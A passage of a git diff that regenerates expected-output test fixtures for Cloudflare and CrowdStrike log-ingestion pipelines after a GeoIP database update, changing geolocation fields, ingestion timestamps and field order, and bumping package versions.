@@ -3730,14 +3730,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3749,6 +3749,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389096639Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"441c9104-05e7-5992-9da1-ae5c13536a44\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:03:16Z\"}", + "kind": "event", + "action": "login", + "id": "441c9104-05e7-5992-9da1-ae5c13536a44", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3763,20 +3777,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776226731Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"441c9104-05e7-5992-9da1-ae5c13536a44\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:03:16Z\"}", - "kind": "event", - "action": "login", - "id": "441c9104-05e7-5992-9da1-ae5c13536a44", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -3804,22 +3804,30 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, + "event": { + "ingested": "2021-12-14T14:41:11.389097027Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"type\":\"user\"},\"id\":\"0c4c5855-e752-55df-8705-26baac6ac0ac\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-05-10T12:26:19Z\"}", + "kind": "event", + "action": "login", + "id": "0c4c5855-e752-55df-8705-26baac6ac0ac", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -3834,20 +3842,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776229335Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"type\":\"user\"},\"id\":\"0c4c5855-e752-55df-8705-26baac6ac0ac\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-05-10T12:26:19Z\"}", - "kind": "event", - "action": "login", - "id": "0c4c5855-e752-55df-8705-26baac6ac0ac", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json index 5290c6b7546..60030ef519b 100644 --- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json @@ -10,14 +10,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -143,14 +143,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -171,7 +171,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:36:03.427502200Z", + "ingested": "2021-12-14T14:41:17.384224478Z", "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\
",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", "kind": "event", "start": "2019-08-02T15:29:08.000Z", @@ -197,14 +197,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -301,14 +301,14 @@ "observer": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "type": "proxy", @@ -331,14 +331,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -354,7 +354,7 @@ }, "event": { "duration": 63000000, - "ingested": "2021-12-09T13:36:03.427511200Z", + "ingested": "2021-12-14T14:41:17.384227805Z", "original": "{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"89.160.20.156\",\
"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:02:38.812Z", @@ -389,14 +389,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -520,14 +520,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -548,7 +548,7 @@ }, "event": { "duration": 8000000, - "ingested": "2021-12-09T13:36:03.427515700Z", + "ingested": "2021-12-14T14:41:17.384228500Z", "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"89.160.20.156\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAF
RuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:24:24.676Z", diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 933a62bc468..1d3d68e522f 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,6 +1,6 @@ name: cloudflare title: Cloudflare -version: 1.2.0 +version: 1.2.1 release: ga description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml index 72164b30d22..c81bc022a34 100644 --- a/packages/crowdstrike/changelog.yml +++ b/packages/crowdstrike/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json index 06abc84c8fa..52124879357 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json 
@@ -17,7 +17,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-12-09T13:36:08.382628100Z", + "ingested": "2021-12-14T14:41:23.505199694Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1045,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1582830734000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1582830734\n }\n}", "kind": "event", "action": [ @@ -73,7 +73,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-12-09T13:36:08.382637400Z", + "ingested": "2021-12-14T14:41:23.505202410Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1046,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1582830772000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1582830772\n }\n}", "kind": "event", "action": [ @@ -113,13 +113,6 @@ ] }, { - "source": { - "ip": "10.10.0.8" - }, - "message": "Crowdstrike Streaming API", - "tags": [ - "preserve_original_event" - ], "event.action": "stream_started", "@timestamp": "2020-02-12T21:29:10.710Z", "ecs": { 
@@ -133,8 +126,11 @@ "10.10.0.8" ] }, + "source": { + "ip": "10.10.0.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382641600Z", + "ingested": "2021-12-14T14:41:23.505202897Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -145,6 +141,7 @@ "kind": "event", "outcome": "success" }, + "message": "Crowdstrike Streaming API", "crowdstrike": { "event": { "UserIp": "10.10.0.8", @@ -186,16 +183,12 @@ }, "user": { "name": "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-12T21:39:37.147Z", "ecs": { 
@@ -209,8 +202,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382646400Z", + "ingested": "2021-12-14T14:41:23.505203317Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581543577147,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581543577147\n }\n}", "category": [ "authentication" @@ -221,6 +217,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-12T21:39:37.147Z", @@ -241,16 +238,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.3" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-12T22:14:37.554Z", "ecs": { @@ -264,8 +257,11 @@ "192.168.6.3" ] }, + "source": { + "ip": "192.168.6.3" + }, "event": { - "ingested": "2021-12-09T13:36:08.382651900Z", + "ingested": "2021-12-14T14:41:23.505203706Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 2,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581545677554,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"bob@company.com\",\n \"UserIp\": \"192.168.6.3\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581545677554\n }\n}", "category": [ "authentication" 
@@ -276,6 +272,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-12T22:14:37.554Z", @@ -296,7 +293,10 @@ "user": { "name": "bob@company.com", "email": "bob@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-02-12T22:24:08.000Z", @@ -315,7 +315,7 @@ "ip": "192.168.6.13" }, "event": { - "ingested": "2021-12-09T13:36:08.382656900Z", + "ingested": "2021-12-14T14:41:23.505204142Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 3,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581546248000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"chris@company.com\",\n \"UserIp\": \"192.168.6.13\",\n \"OperationName\": \"update_group\",\n \"ServiceName\": \"groups\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"group_id\",\n \"ValueString\": \"3c80ce30b9654cb4bd15beec6a517e65\"\n },\n {\n \"Key\": \"action_name\",\n \"ValueString\": \"add_group_member\"\n }\n ],\n \"UTCTimestamp\": 1581546248\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -363,13 +363,6 @@ ] }, { - "source": { - "ip": "192.168.6.8" - }, - "message": "CrowdStrike Authentication", - "tags": [ - "preserve_original_event" - ], "event.action": "request_reset_password", "@timestamp": "2020-02-13T13:41:52.140Z", "ecs": { 
@@ -383,8 +376,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382662800Z", + "ingested": "2021-12-14T14:41:23.505204541Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 4,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601312140,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"requestResetPassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601312140,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"alice@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -395,6 +391,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UserIp": "192.168.6.8", @@ -421,16 +418,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-13T13:42:21.730Z", "ecs": { @@ -444,8 +437,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382667Z", + "ingested": "2021-12-14T14:41:23.505204919Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 5,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601341730,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601341730\n }\n}", "category": [ "authentication" 
@@ -456,6 +452,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:42:21.730Z", @@ -476,16 +473,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "change_password", "@timestamp": "2020-02-13T13:45:20.236Z", "ecs": { @@ -499,8 +492,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382671300Z", + "ingested": "2021-12-14T14:41:23.505205308Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 6,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601520236,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"changePassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601520236,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -511,6 +507,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UserIp": "192.168.6.8", @@ -537,16 +534,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "user_authenticate", "@timestamp": "2020-02-13T13:46:12.362Z", "ecs": { 
@@ -560,8 +553,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382674800Z", + "ingested": "2021-12-14T14:41:23.505205689Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 7,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601572362,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"userAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601572362\n }\n}", "category": [ "authentication" @@ -572,6 +568,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:46:12.362Z", @@ -592,16 +589,12 